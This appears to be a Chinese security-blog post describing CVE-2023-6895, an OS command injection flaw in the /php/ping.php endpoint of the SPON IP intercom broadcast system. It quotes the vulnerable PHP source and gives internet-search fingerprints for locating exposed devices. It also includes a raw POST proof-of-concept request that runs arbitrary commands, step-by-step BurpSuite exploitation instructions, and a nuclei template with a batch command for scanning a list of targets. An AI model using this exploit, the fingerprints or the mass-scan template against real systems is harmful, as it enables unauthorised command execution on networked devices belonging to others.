世邦IP网络对讲广播系统远程命令执行漏洞
前言:本文中涉及到的相关技术或工具仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担,如有侵权请联系。
由于微信公众号推送机制改变了,快来设置星标不再迷路,谢谢大家!
漏洞详情:
世邦IP网络对讲广播系统3.0.3_20201113_RELEASE(HIK)中发现了漏洞。它被宣布为危急状态。此漏洞影响文件/php/ping. php的未知代码。使用输入netstat -ano操作参数jsondata[ip]会导致os命令注入。升级到4.1.0版本可以解决这个问题。建议升级受影响的组件。
影响范围
v3.0.3_20201113_RELEASE(HIK)
资产测绘
fofa:icon_hash="-1830859634"鹰图:web.icon=="e854b2eaa9e4685a95d8052d5e3165bc"
漏洞所在代码:
header("Content-type: text/html; charset=GB2312");$postData = $_POST['jsondata'];if(isset($postData['ip']) && isset($postData['type'])){$type = $postData['type'];//类型$ip = $postData['ip'];//IP地址$arr = systemopr($type, $ip);$len = count($arr);for($i = 0; $i < $len; $i++){if(isset($arr[$i])){$arr[$i] = iconv('GB2312', 'UTF-8', $arr[$i]);//gb2312转换为utf-8}}$after = json_encode($arr);//转换成jsonecho $after;}function systemopr($type, $ip, $times=4){$info = array();if (PATH_SEPARATOR==':' || DIRECTORY_SEPARATOR=='/'){//linuxif($type == "0"){exec("ping -c $times $ip", $info);}else if($type == "1"){exec("traceroute -m $times -w 1 $ip", $info);}else{exec($ip, $info);}}else{//windowsif($type == "0"){exec("ping $ip -n $times", $info);}else if($type == "1"){exec("tracert -h $times -w 1000 $ip", $info);}else{exec($ip, $info);}}return $info;}
可以看到问题在systemopr(),发现当$postData['type']和$postData['ip']存在值时,则会传入systemopr函数,通过exec()函数进行拼接命令执行,当$postData['type']等于0或1时,则代入指定代码段,执行指定命令。但$postData['type']参数值不等于0和1时,可以不考虑参数闭合,直接可以通过$postData['ip']执行任意命令。而且恰巧$postData['type']和$postData['ip']的值都是POST传参可控的,导致我们可以执行任意系统命令。
漏洞利用
pocPOST /php/ping.php HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 45Origin:Connection: closeReferer: http://xxx.xxx.xxx/html/system.htmlX-Forwarded-For:jsondata[type]=3&jsondata[ip]=ipconfig
使用方法:
1、使用浏览器访问目标系统,并使用BurpSuite进行拦截抓包或hackbar等;
2、拦截的GET请求包转换成POST包,并添加/php/ping.php地址,请求内容为:jsondata[type]=99&jsondata[ip]=ipconfig 其他内容不修改
3、Unicode编码转换
http://www.kuquidc.com/convert/Unicode.php。
漏洞修复建议
升级到4.1.0版本
目前厂商已发布升级补丁以修复漏洞,补丁获取链接:
https://www.spon.com.cn/
id: CVE-2023-6895info:name: spon世邦IP网络对讲广播系统远程命令执行漏洞author: fgzseverity: criticaldescription: spon世邦IP网络对讲广播系统,采用领先的IPAudio™技术,将音频信号以数据包形式在局域网和广域网上进行传送,是一套纯数字传输系统。它解决了传统对讲广播系统存在的传输距离有限、易受干扰等问题。世邦IP网络对讲广播系统3.0.3_20201113_RELEASE的/php/ping.php接口存在RCE漏洞。攻击者可以通过在受攻击系统上执行恶意命令,从而获取未授权的系统访问权限。metadata:max-request: 1fofa-query: icon_hash="-1830859634"verified: truerequests:- raw:- |+POST /php/ping.php HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestConnection: closejsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfigmatchers:- type: dsldsl:- "status_code == 200 && contains(body, 'IP')"
批量使用方法
nuclei -t CVE-2023-6895.yaml -l url.txt
感谢各位大佬们关注-不秃头的安全,后续会坚持更新渗透漏洞思路分享、安全测试、好用工具分享以及挖掘SRC思路等文章,同时会组织不定期抽奖,希望能得到各位的关注与支持。
原文始发于微信公众号(不秃头的安全):漏洞情报-世邦IP网络对讲广播系统远程命令执行漏洞CVE-2023-6895
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论